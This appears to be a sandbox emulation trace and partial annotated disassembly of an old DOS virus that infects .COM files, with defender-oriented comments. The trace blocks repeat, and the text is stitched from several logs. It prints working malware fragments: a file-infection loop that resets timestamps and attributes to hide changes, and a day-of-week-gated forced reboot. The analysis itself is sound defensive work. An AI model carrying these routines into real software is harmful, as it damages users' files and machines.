; attribute bits are not reliable change indicators here; compare file size and content hash instead.
2018-12-25T11:59:43.757933184Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds returned by get-time
0x12c1e: je 0x12c17    ; seconds == 0 -> back to 0x12c17 (outside this window; presumably retries until non-zero)
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; store the non-zero seconds byte (use not visible here; possibly a per-copy key - confirm in 0x12c9d)
0x12c24: call 0x12c9d    ; routine not shown; the trace's 675-byte write (PC 12cf9) happens inside it
0x12c27: mov ax, 0x5701    ; INT 21h AH=57h, AL=01h: set file date and time
0x12c2a: mov cx, word ptr [bp + 0x418]    ; CX = time word read from [bp+0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]    ; DX = date word (0x417/0x418/0x41a match attr/time/date of a find-file DTA at bp+0x402 - assumption, confirm)
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh: close file (handle presumably still in BX)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = attribute byte read from [bp+0x417], zero-extended
0x12c3e: call 0x12c5a    ; routine not shown; the trace logs INT 21h/43h (file attributes) at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42    ; helper: AH=42h move file pointer; AL (origin) is left as set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx    ; CX:DX = offset 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; helper start: AH=1Ah set disk transfer address (rest of the stub is past this window)
2018-12-25T11:59:43.761727947Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.771544353Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.773558675Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.782599026Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.793988529Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.797259725Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.805037821Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.812709236Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.814708323Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.825971096Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.834187463Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.83738171Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.838969288Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.842603342Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.85213702Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.85385141Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.863507511Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.874587108Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.877620552Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.885937974Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.893261413Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.895706709Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.907144589Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.915348721Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.918759558Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.920611024Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.92478127Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.934307592Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.935948022Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.945639025Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.956790967Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.96337435Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.972234947Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.980027766Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.982249741Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.994458434Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.002068578Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.00524724Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.007581538Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.010634898Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.019789309Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.021548664Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.030431539Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.041213513Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.04411137Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.053090878Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.060723775Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.062909681Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.072465438Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.078526166Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.082091257Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.084527224Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.08739881Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.103520308Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.10771514Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.109887109Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.115152008Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.120126956Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.128323967Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.135702535Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.141196202Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.152483523Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.160061359Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.163658183Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.166969415Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.170209832Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.180537354Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.184710196Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.191573695Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.198529359Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.201415515Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.206148858Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.210488596Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.212702095Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.219736874Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.224448169Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.226687976Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.228533474Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.230800648Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.236642163Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.238480146Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.247844996Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.254633239Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.25715322Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.261605027Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.265944644Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.268285196Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.270176732Z 59 PC: 12ac0 | Change current directory
; Window around the return from INT 21h/2Ah (get date): a date check guarding a reboot payload, then the clean-up path.
; The run configuration shown on this page sets the emulated date to 1980-01-01 (a Tuesday), so this run takes
; the jne below and only the clean-up path appears in the trace.
2018-12-25T11:59:44.273105439Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; AL = day of week from get-date (0 = Sunday), so 4 = Thursday
0x12ac8: jne 0x12ae0    ; not Thursday -> skip to the clean-up path
0x12aca: cmp dh, 0xe    ; DH = month (1-12) from the same call
0x12acd: ja 0x12ae0    ; never taken for a valid month, so the day-of-week test is the only effective condition (DL, the day, may have been intended - unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h requests a cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry point: the machine reboots
0x12adf: retf    ; not reached after the far jump
0x12ae0: mov ax, 0x2524    ; INT 21h AH=25h set interrupt vector, AL=24h = critical-error handler (the trace's 'Set random record number' label is INT 21h function 24h, not this vector)
0x12ae3: lds dx, ptr [bp + 0x446]    ; DS:DX = far pointer stored at [bp+0x446] (presumably the original vector read by the earlier get-interrupt-vector call - confirm)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS again after lds changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2]    ; DS:DX = path buffer (presumably the directory saved by the earlier get-current-directory call)
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b    ; set-DTA stub (begins with mov ah, 0x1a); the trace logs it at PC 12c4f
0x12af9: cmp sp, 0x4b50    ; purpose not determinable from this window
2018-12-25T11:59:44.275392766Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.276456083Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.277868235Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.833463923Z 26 PC: 12c4f | Set disk transfer address
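2018-12-25T11:59:43.835537636Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)
2018-12-25T11:59:43.837021575Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36', i.e. vector 24h, the DOS critical-error handler; the 'Set random record number' label is the name of INT 21h function 24h, not of this vector)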
2018-12-25T11:59:43.838428484Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.841969212Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.848517565Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.85932209Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.871239495Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.877879646Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.879883022Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.895476684Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.902519987Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.905614565Z 66 PC: 12c4a | Move file pointer
; Window around the return from INT 21h/2Ch (get time): end of the per-file write path, then two small DOS helper stubs.
; Defender note: after writing, the code appears to put back the file's date/time and attributes, so mtime and
; attribute bits are not reliable change indicators here; compare file size and content hash instead.
2018-12-25T11:59:43.907282026Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0    ; DH = seconds returned by get-time
0x12c1e: je 0x12c17    ; seconds == 0 -> back to 0x12c17 (outside this window; presumably retries until non-zero)
0x12c20: mov byte ptr [bp + 0x3a5], dh    ; store the non-zero seconds byte (use not visible here; possibly a per-copy key - confirm in 0x12c9d)
0x12c24: call 0x12c9d    ; routine not shown; the trace's 675-byte write (PC 12cf9) happens inside it
0x12c27: mov ax, 0x5701    ; INT 21h AH=57h, AL=01h: set file date and time
0x12c2a: mov cx, word ptr [bp + 0x418]    ; CX = time word read from [bp+0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]    ; DX = date word (0x417/0x418/0x41a match attr/time/date of a find-file DTA at bp+0x402 - assumption, confirm)
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh: close file (handle presumably still in BX)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = attribute byte read from [bp+0x417], zero-extended
0x12c3e: call 0x12c5a    ; routine not shown; the trace logs INT 21h/43h (file attributes) at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42    ; helper: AH=42h move file pointer; AL (origin) is left as set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx    ; CX:DX = offset 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; helper start: AH=1Ah set disk transfer address (rest of the stub is past this window)
2018-12-25T11:59:43.914186095Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.926771137Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.928205516Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.936992366Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.946625341Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.94918505Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.958481973Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.964956771Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.966861839Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.985254711Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.991778133Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.994974302Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.997558751Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.999999605Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.008729292Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.011738528Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.019438857Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.029392327Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.032548643Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.039969338Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.046560185Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.048810767Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.059378692Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.066184656Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.069440341Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.071989025Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.074746409Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.08373235Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.086466622Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.094186411Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.103881645Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.106953191Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.113705398Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.120464855Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.124129713Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.134587992Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.146492879Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.154106384Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.15611906Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.158816676Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.16792955Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.169818571Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.177434549Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.187261891Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.191009051Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.197705586Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.204139945Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.207877848Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.212391022Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.217167416Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.220970349Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.22258042Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.225238857Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.241449022Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.242988936Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.244743721Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.249867774Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.252818876Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.259102876Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.266461821Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.268495225Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.278847408Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.286114981Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.289154991Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.290837406Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.294068653Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.303640882Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.305436229Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.31111133Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.317452437Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.319228555Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.324019327Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.329006796Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.330299408Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.338567759Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.342841042Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.347605614Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.349308689Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.351399271Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.356539373Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.358426856Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.363514408Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.370335422Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.378224511Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.382916227Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.386884025Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.388489311Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.390726474Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.396543275Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
; Disassembly window captured at PC 0x12ac6, where the trace logs INT 21h
; function 42 (0x2A, "Get date"); the compare on AL at 0x12ac6 is on the trace
; line just above. Two paths follow: a date-gated machine reset
; (0x12acf-0x12ada) and the clean-up path at 0x12ae0. The next call the trace
; logs is at PC 12ae9, so the clean-up path is the one taken in this run.
0x12ac8: jne 0x12ae0                     ; AL (day of week from Get date, 0 = Sunday) is not 4 (Thursday): skip the reset path
0x12aca: cmp dh, 0xe                     ; DH is the month after Get date
0x12acd: ja 0x12ae0                      ; unsigned DH > 14 skips the reset; NOTE(review): a month never exceeds 12, so this test cannot skip — the day in DL may have been intended; confirm
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax                      ; DS = 0x0040, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0          ; clears the word at 0040:0072, the BIOS reset flag (0x1234 there requests a warm boot)
0x12ada: ljmp 0xffff:0                   ; far jump to FFFF:0000, the processor reset entry point: the machine reboots
0x12adf: retf                            ; follows an unconditional far jump; reached only if something outside this window branches here
; Clean-up path.
0x12ae0: mov ax, 0x2524                  ; AH=0x25 set interrupt vector, AL=0x24: the DOS critical-error handler vector
0x12ae3: lds dx, ptr [bp + 0x446]        ; DS:DX = far pointer stored at bp+0x446 — presumably the handler address saved by the earlier Get interrupt vector call (trace PC 12a8e); confirm
0x12ae7: int 0x21                        ; the trace logs this as Interrupt = '36': 36 decimal is 0x24; its "Set random record number" gloss is the name of INT 21h function 0x24, not of this vector
0x12ae9: push cs
0x12aea: pop ds                          ; DS = CS again after lds replaced it
0x12aeb: lea dx, word ptr [bp + 0x3c2]   ; DS:DX = buffer at bp+0x3c2 — presumably the directory saved by the earlier Get current directory call; confirm
0x12aef: mov ah, 0x3b                    ; AH=0x3B change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80                    ; offset 0x80 — presumably the default DTA inside the PSP; confirm
0x12af6: call 0x12c4b                    ; target outside this window; the trace logs "Set disk transfer address" at PC 12c4f right after
0x12af9: cmp sp, 0x4b50                  ; window ends here; what this compare guards is not visible
2018-12-25T11:59:44.399955577Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.40195957Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.404062461Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.994915236Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.997404281Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.99983501Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.002176813Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.005806708Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.013470164Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.020562994Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.027993457Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.035419419Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.0373295Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.057788064Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.066075824Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.073854958Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.075520039Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Disassembly window captured at PC 0x12c1b, where the trace logs INT 21h
; function 44 (0x2C, "Get time"); the compare on DH at 0x12c1b is on the trace
; line just above. The window starts mid-routine and ends one instruction into
; the code at 0x12c4b.
; Analyst note: the file's date/time stamp is set from stored values before
; the handle is closed, so a modification time cannot be trusted as evidence
; that a file was left untouched; compare content or size instead.
0x12c1e: je 0x12c17                      ; DH == 0 (DH is the seconds field after Get time): branch back to 0x12c17, outside this window — presumably re-reads the clock until DH is non-zero
0x12c20: mov byte ptr [bp + 0x3a5], dh   ; keep the non-zero DH in the byte at bp+0x3a5; its later use is not visible here
0x12c24: call 0x12c9d                    ; target outside this window; the trace logs a 675-byte write at PC 12cf9 right after this point — presumably made inside that routine
0x12c27: mov ax, 0x5701                  ; AH=0x57, AL=0x01: set file date and time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]   ; time word — presumably the value saved before the file was modified; confirm
0x12c2e: mov dx, word ptr [bp + 0x41a]   ; date word, same caveat
0x12c32: int 0x21
0x12c34: mov ah, 0x3e                    ; AH=0x3E close file handle
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]   ; CX = zero-extended byte at bp+0x417 — presumably the saved attribute byte; confirm
0x12c3e: call 0x12c5a                    ; target outside this window; the trace logs "Get or set file attributes" at PC 12c63 right after the close
0x12c41: ret
; Separate entry after the ret above (presumably a helper): move file pointer with a zero offset.
0x12c42: mov ah, 0x42                    ; AH=0x42 move file pointer; AL (seek origin) is whatever the caller set
0x12c44: xor cx, cx
0x12c46: xor dx, dx                      ; CX:DX = 0 offset
0x12c48: int 0x21
0x12c4a: ret
; Next entry: only its first instruction falls inside the window.
0x12c4b: mov ah, 0x1a                    ; AH=0x1A set disk transfer address; the trace logs that call at PC 12c4f
2018-12-25T11:59:44.078712829Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.088386817Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.089935847Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.098632087Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.109596432Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.113389787Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.119843966Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.124312882Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.125609194Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.132147687Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.137128354Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.139163104Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.140313608Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.142595939Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.149189965Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.150622354Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.160047954Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.171407926Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.174889556Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.183801021Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.19101953Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.193070666Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.204951272Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.212373894Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.215844455Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.218265574Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.221396776Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.23114014Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.233472416Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.24328932Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.254276767Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.257218204Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.264801281Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.272777176Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.275237086Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.287297155Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.307383124Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.310974863Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.313937156Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.317568803Z 64 PC: 12cf9 | Write file or device (See above)
